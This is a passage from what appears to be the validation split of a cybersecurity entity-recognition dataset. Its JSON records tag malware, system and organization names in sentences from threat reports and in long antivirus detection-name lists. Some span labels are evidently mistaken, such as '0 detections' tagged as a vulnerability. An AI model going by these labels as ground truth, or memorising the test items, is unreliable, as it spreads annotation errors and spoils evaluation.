Backdoor.ASP.Seasharpee", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000828", "source": "cyner2_valid"}} {"text": "As seen from the code in Figure 5 , the commands RuMMS supports right now include : install_true : to modify app preference to indicate that the C2 server received the victim device ’ s status .", "spans": {"Malware: RuMMS": [[49, 54]]}, "info": {"id": "cyner2_valid_000829", "source": "cyner2_valid"}} 
{"text": "In practice, these capabilities are used to steal HTTP Cookies on popular social network sites and perform fraudulent actions such as non-legitimate follows views and likes on such sites.", "spans": {}, "info": {"id": "cyner2_valid_000830", "source": "cyner2_valid"}} {"text": "Although it 's not pretty simple to hack Android devices and gadgets , sometimes you just get lucky to find a backdoor access .", "spans": {"System: Android": [[41, 48]]}, "info": {"id": "cyner2_valid_000831", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.OlayFara.PE Trojan.Win32.Patch.1!O W32.Slugin.A Virus.Slugin.Win32.1 Win32.Virus.Slugin.a W32/Slugin.B W32.Slugin.A!inf Win32/Slugin.A PE_WPLUG.A Win.Spyware.59563-2 Virus.Win32.Slugin.a Virus.Win32.Slugin.ddowbn Troj.Spy.mt4a Worm.Win32.FakeFolder.e Trojan.MulDrop4.55815 PE_WPLUG.A W32/Slugin.B Win32/PatchFile.bi W32/Slugin.A Win32.Sality.ab.173464 Worm:Win32/Folstart.A Win32.Patched.N Virus.Win32.Slugin.a HEUR/Fakon.mwf Win32.Slugin.A W32/Wplug.A Worm.Win32.FakeFolder.CT", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000832", "source": "cyner2_valid"}} {"text": "Adding connections to FakeSpy We have been seeing activity from XLoader since 2018 , and have since followed up our initial findings with a detailed research revealing a wealth of activity dating back to as early as January 2015 , which outlined a major discovery—its connection to FakeSpy .", "spans": {"Malware: FakeSpy": [[22, 29], [282, 289]], "Malware: XLoader": [[64, 71]]}, "info": {"id": "cyner2_valid_000833", "source": "cyner2_valid"}} {"text": "The raw wave audio buffer frame can be dumped in the getNextBuffer ( ) function .", "spans": {}, "info": {"id": "cyner2_valid_000834", "source": "cyner2_valid"}} {"text": "In 2015, KOVTER, a click-fraud malware, made headlines when it used a file-less technique similar to the POWERLIKS trojan.", "spans": {"Malware: KOVTER,": [[9, 16]], "Malware: click-fraud malware,": [[19, 
39]], "Malware: the POWERLIKS trojan.": [[101, 122]]}, "info": {"id": "cyner2_valid_000835", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Crypmodadv Win32.Trojan.WisdomEyes.16070401.9500.9946 Ransom_Guperd.R002C0DB518 Trojan-Ransom.Win32.Crypmodadv.xpw Trojan.Win32.Encoder.extxks Trojan.Win32.Z.Ransom.1259520 Win32.Trojan.Crypmodadv.Ljan Trojan.Encoder.24362 Ransom_Guperd.R002C0DB518 TR/Guperd.ndytr Trojan-Ransom.Win32.Crypmodadv.xpw Trojan-Ransom.FileCoder W32/Filecoder_MoneroPay.A!tr Trj/CI.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000836", "source": "cyner2_valid"}} {"text": "This shift in targets is highly notable for the active cyber espionage operation we dubbed as Operation Iron Tiger. We believe that the threat actors have simply moved up in the food chain and were assigned new, high-level targets to spy on–all as part of a bigger espionage campaign.", "spans": {}, "info": {"id": "cyner2_valid_000837", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Backdoor/W32.Runagry.355840 Backdoor/Runagry.tu Trojan.Kazy.DD42 Win32.Trojan.WisdomEyes.16070401.9500.9942 Spyware.Keylogger Win.Trojan.Runagry-196 Win32.Trojan-Dropper.Seimon.B Trojan.Win32.Runagry.cobvv Backdoor.W32.Runagry.tu!c Win32.Backdoor.Runagry.Ljkf Trojan.Click1.58111 Backdoor.Runagry.Win32.332 BehavesLike.Win32.Downloader.fh Backdoor.Win32.Runagry Backdoor/Runagry.zn Trojan[Backdoor]/Win32.Runagry TrojanDownloader:Win32/Daumy.A Backdoor/Win32.Runagry.R67088 Backdoor.Runagry!Asgcy5bC1Zs W32/Runagry.TU!tr.bdr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000838", "source": "cyner2_valid"}} {"text": "In early July, TALOS blogged about a new variant of the KONNI remote access trojan RAT, a malware family they discovered and wrote about in another blog post in early May.", "spans": {"Organization: TALOS": [[15, 20]], "Malware: the KONNI remote access trojan RAT,": [[52, 87]], "Malware: malware family": 
[[90, 104]]}, "info": {"id": "cyner2_valid_000839", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.SobigE.Worm Win32.Trojan.WisdomEyes.16070401.9500.9733 Win.Worm.Sobig-4 Worm.Win32.Z.Sobig.36628.G BehavesLike.Win32.Trojan.nh Worm.Win32.Sobig I-Worm/Sobig.e WORM/Sobig.E Worm[Email]/Win32.Sobig Worm:Win32/Sobig.E@mm.dam#2 Worm/Win32.Sobig.R95457 Win32/Worm.3de", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000840", "source": "cyner2_valid"}} {"text": "The attackers are hosting the ServStart malware on a file server that is open for anyone to view.", "spans": {"Malware: the ServStart malware": [[26, 47]], "System: a file server": [[51, 64]]}, "info": {"id": "cyner2_valid_000841", "source": "cyner2_valid"}} {"text": "Quick , easy access to sensitive data on mobile devices connected to enterprises and government agencies around the globe is extremely attractive to cybercriminals and hacktivists .", "spans": {}, "info": {"id": "cyner2_valid_000842", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.OnGameT2KSULAE.Trojan Trojan/W32.Cosmu.2219474 Exploit.Win32.EUDCPoC!O Trojan/Cosmu.aume Trojan.Win32.Cosmu.dtrtj Cosmu.AC Trojan.Win32.Cosmu.aulj Trojan.Meredrop!NInXzeWJQz8 TrojWare.Win32.Spy.Zbot.BPOE Trojan.DownLoader5.17612 BehavesLike.Win32.Trojan.vc TR/Meredrop.A.7775 Trojan/Win32.ADH Win32.Trojan.Cosmu.cclt W32/Cosmu.AULJ!tr Patched2_c.VFD Trojan.Win32.Cosmu.ajW Win32/Trojan.5aa", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000843", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Backdoor.Miancha W64/Backdoor.CUSF-5718 Backdoor.Miancha BKDR64_GRECOM.CA Backdoor.Win32.Miancha.c Trojan.Win64.Miancha.cuslax BackDoor.Miancha.2 Backdoor.Miancha.Win32.1 BKDR64_GRECOM.CA Backdoor/Miancha.d BDS/Miancha.A.6 Backdoor.Win32.Miancha.c Backdoor:Win64/Miancha.A Trojan/Win64.Miancha.C256051 Trj/CI.A Win32.Backdoor.Miancha.Dyqu Backdoor.Miancha! 
Win32/Backdoor.071", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000844", "source": "cyner2_valid"}} {"text": "However , the C2 can send an updated list .", "spans": {}, "info": {"id": "cyner2_valid_000845", "source": "cyner2_valid"}} {"text": "A backdoor targetting Linux also known as: Backdoor.Linux.Shellshock.A ELF_BASHLITE.SMC HEUR:Backdoor.Linux.Gafgyt.b Trojan.Unix.Gafgyt.eikqfj Backdoor.Linux.Gafgyt!c Linux.BackDoor.Fgt.46 ELF_BASHLITE.SMC Linux/Gafgyt.f ELF/Trojan.EEEF-7 Backdoor.Linux.anbf LINUX/Gafgyt.qsqxq Trojan[Backdoor]/Linux.Gafgyt.b Backdoor:Linux/Shellshock.A HEUR:Backdoor.Linux.Gafgyt.b Linux/Gafgyt.f Trojan.Linux.Gafgyt.f Trojan.Linux.Gafgyt ELF/Gafgyt.WN!tr.bdr Win32/Trojan.Flooder.c6e", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000846", "source": "cyner2_valid"}} {"text": "Older samples connecting to eSurv Finally , Google shared with us some older samples of Exodus One ( with hashes 2055584625d24687bd027a63bc0b8faa7d1a854a535de74afba24840a52b1d2f and a37f5d2418c5f2f64d06ba28fe62edee1293a56158ddfa9f04020e316054363f ) which are not obfuscated and use the following disguise : The configuration of these older samples is very similar to newer ones , but it provides additional insights being not obfuscated : Firstly we can notice that , instead of generic domain names or IP addresses , these samples communicated with a Command & Control server located at attiva.exodus.esurv [ .", "spans": {"Organization: eSurv": [[28, 33]], "Organization: Google": [[44, 50]], "Malware: Exodus One": [[88, 98]]}, "info": {"id": "cyner2_valid_000848", "source": "cyner2_valid"}} {"text": "There have been recent reports 1, 2 about a new version of one such commodity RAT, H-W0rm Hworm, and the various campaigns it is being used in.", "spans": {"Malware: RAT, H-W0rm Hworm,": [[78, 96]]}, "info": {"id": "cyner2_valid_000849", "source": "cyner2_valid"}} {"text": "Here is a list of information that GolfSpy steals : 
Device accounts List of applications installed in the device Device ’ s current running processes Battery status Bookmarks/Histories of the device ’ s default browser Call logs and records Clipboard contents Contacts , including those in VCard format Mobile operator information Files stored on SDcard Device location List of image , audio , and video files stored on the device Storage and memory information Connection information Sensor information SMS messages Pictures GolfSpy also has a function that lets it connect to a remote server to fetch and perform commands , including : searching for , listing , deleting , and renaming files as well as downloading a file into and retrieving a file from the device ; taking screenshots ; installing other application packages ( APK ) ; recording audio and video ; and updating the malware .", "spans": {"Malware: GolfSpy": [[35, 42], [526, 533]]}, "info": {"id": "cyner2_valid_000850", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Backdoor.Dunsenr.MUE.B4 Trojan.Heur.emKfrzyHlQmbh Win32.Trojan.Kryptik.gp W32/Trojan-Gypikon-based.BA!Max Backdoor.Trojan Trojan.Win32.PolyCrypt.dpmiea TrojWare.Win32.Amtar.MUVP BackDoor.PcClient.6500 Backdoor.Win32.Dunsenr W32/Trojan-Gypikon-based.BA!Max W32.Worm.Morto.E Backdoor:Win32/Dunsenr.B Trojan/Win32.1Table.R120825 Backdoor.Win32.Dunsenr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000851", "source": "cyner2_valid"}} {"text": "Proofpoint researchers analyzed the activity in the recent return to operations of the Dridex actors and identified numerous changes in behavior, from technical innovations to distributing other banking and data-stealing malware.", "spans": {"Organization: Proofpoint researchers": [[0, 22]], "Malware: banking and data-stealing malware.": [[195, 229]]}, "info": {"id": "cyner2_valid_000853", "source": "cyner2_valid"}} {"text": "WannaCry ransomware's outbreak during the weekend was mitigated by having its kill switch domain 
registered.", "spans": {"Malware: WannaCry ransomware's": [[0, 21]]}, "info": {"id": "cyner2_valid_000854", "source": "cyner2_valid"}} {"text": "After achieving root access , Gooligan downloads a new , malicious module from the C & C server and installs it on the infected device .", "spans": {"Malware: Gooligan": [[30, 38]]}, "info": {"id": "cyner2_valid_000856", "source": "cyner2_valid"}} {"text": "In these campaigns, though, Kronos acted as a loader with a new Point-of-Sale POS malware dubbed ScanPOS as the secondary payload.", "spans": {"Malware: Kronos": [[28, 34]], "Malware: Point-of-Sale POS malware": [[64, 89]], "Malware: ScanPOS": [[97, 104]], "Malware: secondary payload.": [[112, 130]]}, "info": {"id": "cyner2_valid_000858", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Win32.Scar!O Worm.Racvacs.AA2 W32/Autorun.worm.bbx Trojan/AutoRun.IRCBot.ef TSPY_RACVACS_BH0800EE.TOMC Win32.Trojan.IRCBot.b W32.SillyFDC TSPY_RACVACS_BH0800EE.TOMC Trojan.Win32.Scar.gxqcq Troj.W32.Cosmu.ldLk Worm.Win32.Autorun.lbe Win32.HLLW.Autoruner.57283 Trojan.Scar.Win32.42023 BehavesLike.Win32.StartPage.lm Trojan-Downloader.Win32.Busky Trojan/Win32.Scar Worm:Win32/Racvacs.A Trojan.Win32.A.Scar.17430 Trojan/Win32.Scar.C44140 BScope.Trojan-Spy.Zbot W32/Scar.DGXM!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000859", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Win32.Inject.xhfk W32/Trojan2.GJSY W32.IRCBot Win32/Tnega.Q Win32.Trojan Trojan.Win32.Inject.azob Trojan.Inject!v0uuxT5SLxE Trojan.Win32.Crypt.15872.B Win32.HLLW.Autoruner.6398 TR/Inject.azob Trojan/Inject.doq Worm:Win32/Synigh.A Win32/Aimbot.worm.15872 W32/Trojan2.GJSY Trojan.IRCBot!rem Backdoor.IRCbot!32EF Exploit.Win32.MS08067 W32/Inject.RQ!tr W32/Maimbot.A.worm", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000861", "source": "cyner2_valid"}} {"text": "The information collected by the malware and the control over the 
victim 's mobile device allows their operators to perform more complex social engineering attacks .", "spans": {}, "info": {"id": "cyner2_valid_000862", "source": "cyner2_valid"}} {"text": "While you may have it running in your environment, you may not be familiar with its workings to provide adequate incident response when the time come.", "spans": {}, "info": {"id": "cyner2_valid_000864", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan/Kheagol.c PUA.Packed.PECompact-1 Crypt.RFZ", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000866", "source": "cyner2_valid"}} {"text": "So, let us explain in detail how Switcher performs its brute-force attacks, gets into the routers and undertakes its DNS-hijack.", "spans": {"System: Switcher": [[33, 41]], "System: routers": [[90, 97]]}, "info": {"id": "cyner2_valid_000867", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Dovs Troj.W32.Dovs!c Win32.Trojan.WisdomEyes.16070401.9500.9999 TSPY_HPEMOTET.SMF3 Win.Trojan.Emotet-6443311-0 Trojan.Win32.Dovs.jel Trojan.Win32.Dovs.extnjp Trojan.Win32.Z.Ser.126976.V Trojan.Dovs.Win32.3111 BehavesLike.Win32.Rootkit.ch TR/Crypt.ZPACK.ouwws Trojan/Win32.Dovs Trojan:Win32/Kuoerl.A Trojan.Ser.Razy.1 Trojan.Win32.Dovs.jel Trj/RnkBend.A Win32.Trojan.Dovs.Wvay Trojan-Banker.Emotet W32/Kryptik.GBTT!tr Win32/Trojan.1ce", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000868", "source": "cyner2_valid"}} {"text": "A backdoor also known as: JS:Trojan.Crypt.PN Script-VBS/W32.RAA JS:Trojan.Crypt.PN JS.RansomRAA JS/Filecoder.RAA.A Ransom_JSRAA.A Trojan-Ransom.JS.RaaCrypt.b JS:Trojan.Crypt.PN Trojan.Script.Heuristic-js.iacgm Js.Trojan.Raacrypt.Stua JS:Trojan.Crypt.PN Trojan:JS/CryptoRa.A JS.Muldrop.138 Ransom_JSRAA.A Trojan.CKFD-9 Trojan.JS.fkn JS/RaaLocker.A Ransom:JS/CryptoRaa.A Trojan-Ransom.JS.RaaCrypt.b JS:Trojan.Crypt.PN Trojan-Ransom.Script.Raa JS/Ransom.RAA!tr js.url.downloader.n", "spans": {"Malware: 
backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000869", "source": "cyner2_valid"}} {"text": "Extract logs from Facebook Messenger conversations .", "spans": {"System: Facebook Messenger": [[18, 36]]}, "info": {"id": "cyner2_valid_000874", "source": "cyner2_valid"}} {"text": "This also has a jrat java.jar file attachment so trying to give you a double blow.", "spans": {}, "info": {"id": "cyner2_valid_000875", "source": "cyner2_valid"}} {"text": "In the past , XLoader showed the ability to mine cryptocurrency on PCs and perform account phishing on iOS devices .", "spans": {"Malware: XLoader": [[14, 21]], "System: iOS": [[103, 106]]}, "info": {"id": "cyner2_valid_000876", "source": "cyner2_valid"}} {"text": "The attack campaign , named Gooligan , breached the security of over one million Google accounts .", "spans": {"Malware: Gooligan": [[28, 36]], "Organization: Google": [[81, 87]]}, "info": {"id": "cyner2_valid_000877", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.OnGameT2KSULAE.Trojan Abuse-Worry/W32.PasswordRecovery.3325952 PSWTool.W32.PasswordRecovery.af!c TROJ_INFOSTL.SMP Infostealer.Viwir TROJ_INFOSTL.SMP not-a-virus:PSWTool.Win32.PasswordRecovery.af TrojWare.Win32.Spy.Zbot.BPOE BehavesLike.Win32.PWSZbot.wc Trojan-PWS.Win32.Deka Trojan.Strictor.D6C0E PWS:Win32/Fotip.B Trojan/Win32.HDC.C171142 Trojan.Strictor!oEy39iPnn7k", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000878", "source": "cyner2_valid"}} {"text": "Targets The initial version of Ginp had a generic credit card grabber overlay screen used for all targeted applications .", "spans": {"Malware: Ginp": [[31, 35]]}, "info": {"id": "cyner2_valid_000880", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Backdoor.Itaduke!u7PVM40U470 W32/Injector.HG Trojan.Swaylib Injector.DGQL TROJ_INJECT.CPX Backdoor.Win32.Itaduke.g Trojan.Win32.Itaduke.btxwlc TROJ_INJECT.CPX W32/Injector.ISUC-1784 Backdoor/Itaduke.b TR/Injector.anz 
Trojan[Backdoor]/Win32.Itaduke Exploit:Win32/SandyEva.A Win-Trojan/Itaduke.250880 Backdoor.Itaduke Dialer.EMN Win32/SandyEva.A Win32.Backdoor.Itaduke.Htvr Backdoor.Win32.Itaduke W32/Itaduke.C!tr.bdr Backdoor.Win32.Itaduke.API Win32/Backdoor.092", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000881", "source": "cyner2_valid"}} {"text": "The email address used for registering the domains was anonymized.", "spans": {}, "info": {"id": "cyner2_valid_000882", "source": "cyner2_valid"}} {"text": "Today, we're bringing you news about Win32/Spy.Odlanor, which is used by its malware operator to cheat in online poker by peeking at the cards of infected opponents.", "spans": {}, "info": {"id": "cyner2_valid_000883", "source": "cyner2_valid"}} {"text": "It also clears event logs and the file system journals.", "spans": {}, "info": {"id": "cyner2_valid_000884", "source": "cyner2_valid"}} {"text": "At this point, we re only seeing tech support scams and HoeflerText popups from the EITest campaign.", "spans": {"Malware: HoeflerText": [[56, 67]]}, "info": {"id": "cyner2_valid_000885", "source": "cyner2_valid"}} {"text": "A backdoor also known as: PDF:Exploit.PDF-JS.AAH JS/Pdfka.MC Pdfka.CK PDF:Exploit.PDF-JS.AAH Exploit.Script.Pdfka.btvxj PDF:Exploit.PDF-JS.AAH Exploit.JS.Pidief.FD Exploit:W32/CVE-2010-0188.C Exploit.PDF.5584 EXP/Pidief.ehw PDF:Exploit.PDF-JS.AAH JS/Pdfka.MC JS/Exploit.Pdfka.QJQ PDF:Attention.APT-Bait.OddDocument/RDM!5.38 Exploit.JS.CVE-2010-0806 PDF/Pdfka.QGZ!exploit Script/PDF.Exploit", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000886", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan-Exploit/W32.Pidief.13485.GJ Exploit.IphoneOS.Pdfka.a!c PDF/Trojan.MJNQ-6 Bloodhound.Exploit.351 PDF/Exploit.Pidief.OYE TROJ_PIDIEF.HLA Win.Exploit.Jailbreak-1 Exploit.IphoneOS.Pdfka.a Exploit.Pdf.Pdfka.lkpfs PDF.Z.EXPLOIT.13485.B[h] Exploit:W32/Pidief.CRM Exploit.PDF.2409 TROJ_PIDIEF.HLA EXP/Pdfka.BQ.1 
PDF/Jailbreak.CFF!exploit.CVE20101797 Exploit.IphoneOS.Pdfka.a Exploit:iPhoneOS/Pidief.A Pdf.Exploit.Pdfka.Wtod Trojan.PDF.Exploit Exploit_c.JJY Win32/Trojan.Exploit.052", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000887", "source": "cyner2_valid"}} {"text": "Those permission shown in bold below are the most problematic : Allows an application to write to external storage .", "spans": {}, "info": {"id": "cyner2_valid_000888", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win.Trojan.13288566-1 BehavesLike.Win32.Downloader.vz Trojan.Spy APPL/Yileyoo.olde TrojanDownloader:Win32/Potukorp.A Trojan/Win32.Potukorp.R189768 Trojan.Zusy.D2B86C Win32/Trojan.Downloader.b45", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000889", "source": "cyner2_valid"}} {"text": "Although our primary concern at the time was with the malicious Wellpoint/Anthem and VAE, Inc.", "spans": {"Organization: Wellpoint/Anthem": [[64, 80]], "Organization: VAE, Inc.": [[85, 94]]}, "info": {"id": "cyner2_valid_000890", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9978 Trojan.Win32.Sumserv.f Trojan.Win32.DownLoad2.djega Trojan.DownLoad2.34618 TrojanDownloader:Win32/Deewomz.A Trojan.Win32.Sumserv.f", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000891", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.Virut.G W32/Downldr2.HKUH W32.Virut.CF W32/Virut.DB_2 Win32/Virut.17408 PE_VIRUX.J Virus.Win32.Virut.ce Virus.Win32.Virut.Ce Win32.Virut.56 PE_VIRUX.J Trojan-Downloader.Win32.Snilis!IK Win32/Virut.bn TrojanDownloader:Win32/Snilis.B Win32.Virut.AM W32/Downldr2.HKUH Win32/Virut.F Virus.Virut.09 Malware.Virut Win32/Virut.NBU Trojan-Downloader.Win32.Snilis W32/Virut.CE W32/Sality.AO", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000892", "source": "cyner2_valid"}} {"text": "Users can see a “ Profile Downloaded ” 
added in their settings ( this feature is in iOS 12.2 , but not on iOS 12.1.1 ) .", "spans": {"System: iOS 12.2": [[84, 92]], "System: iOS 12.1.1": [[106, 116]]}, "info": {"id": "cyner2_valid_000895", "source": "cyner2_valid"}} {"text": "It will appear differently to users depending on the language set on the device .", "spans": {}, "info": {"id": "cyner2_valid_000896", "source": "cyner2_valid"}} {"text": "The malware , dubbed “ Judy ” , is an auto-clicking adware which was found on 41 apps developed by a Korean company .", "spans": {"Malware: Judy": [[23, 27]]}, "info": {"id": "cyner2_valid_000897", "source": "cyner2_valid"}} {"text": "MacDownloader strangely attempts to pose as both an installer for Adobe Flash, as well as the Bitdefender Adware Removal Tool, in order to extract system information and copies of OS X keychain databases.", "spans": {"Malware: MacDownloader": [[0, 13]], "System: the Bitdefender Adware Removal Tool,": [[90, 126]], "System: OS X keychain databases.": [[180, 204]]}, "info": {"id": "cyner2_valid_000898", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.MewsSpyTTc.Worm Backdoor.Qakbot.A5 Win32.Trojan.MewsSpy.a Backdoor.Ratenjay BKDR_QAKBOT.SMW5 Trojan.Zusy.D110B6 Trojan.DownLoader10.36780 BKDR_QAKBOT.SMW5 BDS/Qakbot.335360 Trojan/Win32.Unknown Worm.Qakbot Win32/MewsSpy.A W32/MewsSpy.3678!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000899", "source": "cyner2_valid"}} {"text": "Our research also showed that the group still uses some of the infamous PlugX malware variants—a staple in Winntis arsenal—to handle targeted attack operations via the GitHub account we identified.", "spans": {"Organization: group": [[34, 39]], "Malware: PlugX malware variants—a": [[72, 96]], "Malware: Winntis": [[107, 114]], "System: GitHub account": [[168, 182]]}, "info": {"id": "cyner2_valid_000902", "source": "cyner2_valid"}} {"text": "At the same time , cybercriminals are reluctant to change the method of 
communication with the C & C server , since this would require more effort and reap less benefit than modifying the executable file .", "spans": {}, "info": {"id": "cyner2_valid_000903", "source": "cyner2_valid"}} {"text": "A backdoor also known as: HW32.Packed.BF07 W32/Nomis.worm Trojan.Win32.Nimos-wrm.fsds W32.Nimos.Worm Win32/Nimos.A Email-Worm.Win32.Nimos I-Worm.Nimos!nQqMa/EBpWY W32.W.Nimos!c Win32.Worm-email.Nimos.Szvn Worm.Win32.Nimos.A Worm.Nimos.Win32.1 BehavesLike.Win32.Downloader.vc Worm/Nimos.a Worm[Email]/Win32.Nimos Win32/Nimos.worm.2383497 Worm:Win32/Nimos.A@mm Trojan-Spy.Win32.KeyLogger.gs I-Worm/Nimos.A Worm.Win32.Nimos.AIW", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000904", "source": "cyner2_valid"}} {"text": "This happens all the time in regular Android apps , as Activity is one of the fundamental Android UI elements .", "spans": {"System: Android": [[37, 44], [90, 97]]}, "info": {"id": "cyner2_valid_000905", "source": "cyner2_valid"}} {"text": "This new campaign is like the StealZilla campaign in almost every way.", "spans": {}, "info": {"id": "cyner2_valid_000906", "source": "cyner2_valid"}} {"text": "Unfortunately , there is a specific feature of Android vulnerabilities that means it is only possible to get rid of them by receiving an update from the device manufacturers .", "spans": {}, "info": {"id": "cyner2_valid_000907", "source": "cyner2_valid"}} {"text": "However , binding a shell on all available interfaces will obviously make it accessible to anyone who is sharing at least a local network with an infected device .", "spans": {}, "info": {"id": "cyner2_valid_000908", "source": "cyner2_valid"}} {"text": "It is basically SMS spam : many people still follow suspicious links , install software from third-party sources , and give permissions to apps without a second thought .", "spans": {}, "info": {"id": "cyner2_valid_000909", "source": "cyner2_valid"}} {"text": "A backdoor also known as: 
Trojan/W32.Flooder.1576960 Trojan.Demes Tool.Demes.Win32.1 IM-Flooder.W32.Demes.30!c Trojan/Demes.30 W32/Trojan.UOHU-7643 Win.Trojan.Demeto-1 IM-Flooder.Win32.Demes.30 Trojan.Win32.Demes.dfzh Spyware.IM-Flooder.Demes.1576960 FDOS.IM.414 Trojan.Win32.Flooder W32/TrojanX.IWN IM-Flooder.Demes.a TR/Flood.Demes.30 HackTool[Flooder]/Win32.Demes IM-Flooder.Win32.Demes.30 Win32/Flooder.Demes.30 Win32.Trojan.Demes.Eacy Malware_fam.gw Win32/Trojan.2ff", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000910", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9997 Ransom_Bartcrypt.R002C0DKR17 Ransom_Bartcrypt.R002C0DKR17 BehavesLike.Win32.Downloader.ch Ransom:Win32/Bartcrypt.A Trj/GdSda.A Trojan.Win32.Crypt Win32/Trojan.af4", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000912", "source": "cyner2_valid"}} {"text": "The purpose of this module is to extract and execute a malicious payload – the “ patch ” module .", "spans": {}, "info": {"id": "cyner2_valid_000913", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Graftor.D63597 Win32.Trojan.WisdomEyes.16070401.9500.9847 Trojan.Win32.Z.Graftor.1872384 Trojan.Win32.Nando TR/Crypt.ZPACK.gmutq Trojan:Win32/Nando.A!bit Trj/GdSda.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000914", "source": "cyner2_valid"}} {"text": "It then continues executing in a spawned new thread that checks if there are additional undesired modules inside its own virtual address space ( for example , modules injected by certain security solutions ) .", "spans": {}, "info": {"id": "cyner2_valid_000915", "source": "cyner2_valid"}} {"text": "This new malware – dubbed OSX/Dok — affects all versions of OSX, has 0 detections on VirusTotal as of the writing of these words, is signed with a valid developer certificate authenticated by Apple, and is the first major scale malware to target OSX users via a coordinated 
email phishing campaign.", "spans": {"Malware: malware": [[9, 16]], "Malware: OSX/Dok": [[26, 33]], "System: OSX,": [[60, 64]], "Vulnerability: 0 detections": [[69, 81]], "Organization: VirusTotal": [[85, 95]], "Organization: Apple,": [[192, 198]], "Malware: major scale malware": [[216, 235]], "System: OSX": [[246, 249]], "Organization: users": [[250, 255]]}, "info": {"id": "cyner2_valid_000916", "source": "cyner2_valid"}} {"text": "In our test , this command was the value 3 .", "spans": {}, "info": {"id": "cyner2_valid_000918", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Backdoor.Rbot.10 Backdoor/W32.RBot.663552.I Backdoor.Win32.Rbot!O Backdoor.Rbot W32/Realbot.worm Troj.Spy.W32.Delf.mczC Win32.Trojan.WisdomEyes.16070401.9500.9970 Backdoor.IRC.Bot Backdoor.Rbot.10 Backdoor.Win32.Rbot.10 Backdoor.Rbot.10 Trojan.Win32.Rbot.wgke Backdoor.Win32.Z.Rbot.663552 Backdoor.Rbot.10 Backdoor.Win32.Rbot.10 Backdoor.Rbot.10 BackDoor.Rbot.10 Backdoor.RBot.Win32.4265 W32/Backdoor.ESMZ-1303 Backdoor/RBot.ehn Trojan[Backdoor]/Win32.Rbot Backdoor.Win32.Rbot.10 Backdoor:Win32/AXO.A Backdoor.Rbot.10 Backdoor.Rbot Bck/Sdbot.DSO Win32/Rbot.10 Win32.Backdoor.Rbot.Syrl Worm.Rbot!irHO7HQU7I4 Trojan.Win32.Rbot W32/Rbot.10!tr Win32/Backdoor.BO.e6b", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000919", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Mondera.Win32.4242 Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/VBTrojan.17D1!Maximus Backdoor.Win32.Xyligan.aqjo W32.VB.lPRX Trojan.DownLoader25.46992 Virus.Win32.VBInject W32/VBTrojan.17D1!Maximus TrojanDownloader:Win32/Tecstech.A!bit Trojan.Heur.amLfcri0RzpG Backdoor.Win32.Xyligan.aqjo Trojan/Win32.Xyligan.C2274537 Win32/TrojanDownloader.VB.REP Backdoor.Xyligan!2vxzSIC2XQM", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000920", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Keytrap.A Trojan/W32.Keytrap.494592 
